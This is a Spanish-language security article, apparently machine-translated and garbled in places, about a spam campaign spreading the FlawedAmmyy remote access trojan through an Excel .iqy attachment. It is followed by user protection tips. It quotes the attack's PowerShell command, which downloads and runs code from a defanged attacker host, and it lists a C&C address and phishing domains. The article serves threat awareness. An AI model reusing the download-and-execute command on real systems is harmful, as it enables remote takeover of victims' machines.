0
No cabe duda de que el malware sigue siendo una de las amenazas en línea más conocidas y peligrosas que los s enfrentan a diario. Los actores malintencionados lo usan en varios ataques cibernéticos para robar información personal, obtener completo a un sistema informático y hacer todo lo que quieren en la PC.
Este es el caso de las herramientas de istración remota (RAT) que utilizan los ciberdelincuentes para tomar de forma remota el control total de los ordenadores de los s que usan Windows e infectarlas con malware.
Los investigadores de seguridad observaron y analizaron recientemente una nueva campaña de correo no deseado en la que se utilizaba una RAT denominada "defectuoso Ammy" como carga útil.
El nombre proviene de un software legítimo, Ammyy Remote Desktop Software versión 3, utilizado por más de 75 millones de s domésticos y comerciales. Esta RAT se utilizó anteriormente en otros ataques de correo electrónico dirigidos y campañas de spam .
¿Cómo se propaga Flawed Ammy RAT?
En la campaña de spam observada, los actores malintencionados pueden tomar fácilmente el control total de las máquinas de las víctimas, si hacen clic y abren el documento recibido por correo electrónico.
Tenga en cuenta que este ataque utiliza un archivo adjunto de Excel Web Query File (.iqv) , que es un tipo de archivo utilizado para descargar datos de Internet y copiarlo directamente en una hoja de Excel.
El correo electrónico no deseado viene con el siguiente contenido (desinfectado para su propia protección):
Línea de asunto:
IMG_005
Adjunto:
img_005.zip -> img_005. iqySi una víctima abre el archivo adjunto y hace clic en él, se descargará la RAT defectuosa Ammyy y los agentes maliciosos la ejecutarán desde esta ubicación http: // 24horas.s [.] Com / img01 .webp (desinfectada para su seguridad)
El archivo malicioso es en realidad un script de Powershell que puede realizar el siguiente comando:
= Cmd | '/ c C: Windows System32 WindowsPowerShell v1.0 powershell.exe -nop -NoLogo -c IEX ((new-object net.webclient) .string ("http: // 24hourss [.] com / img02 .webp")) '! A0Como se muestra, este script de PowerShell activa la descarga de otro (img02.webp) que contiene características que inician una sesión de cmd.exe y que sueltan el archivo "cmd_.exe" en la carpeta temporal de Windows.
Después de eso, la RAT defectuosa Ammyy se configura para que los atacantes puedan conectarse a la máquina infectada y comunicarse con el siguiente servidor de C & C ubicado en esta dirección IP: 169.239.128 [.] 149, y realizar actividades maliciosas.
Los investigadores de seguridad también han descubierto que el mismo servidor también se ha utilizado para ataques de phishing contra cuentas de iCloud y iTunes:
appleid.itunes.kontolasumeme [.] com
appleid.icloud.asuppepekmemek [.] com
Según 
Cómo proteger su computadora de las RAT
En primer lugar, este tipo de malware puede evitar la detección, por lo que es esencial tomar todas las medidas de seguridad necesarias para mantener la seguridad de sus datos.
- Actualice su sistema operativo, incluidas todas sus aplicaciones y programas de software, porque es el primer lugar donde los actores malintencionados pueden explotar las vulnerabilidades.
- Seguimos recordando esto: NO abra correos electrónicos ni haga clic en archivos / archivos adjuntos que le parezcan sospechosos;
- Siempre tenga una copia de seguridad con todos sus datos importantes en fuentes externas, como un disco duro o en la nube (Google Drive, Dropbox, etc.) para almacenarla.
- Asegúrese de tener un programa antivirus confiable instalado en su computadora para proteger sus valiosos datos de las amenazas en línea.
- Use múltiples capas de protección y considere instalar una solución proactiva de software de seguridad cibernética: Siempre se recomienda la prevención, por lo que aprender lo mejor posible sobre cómo detectar mejor las campañas de spam es la mentalidad correcta. Recomendamos estos recursos educativos gratuitos para obtener más conocimiento en la industria de seguridad cibernética.
Comentarios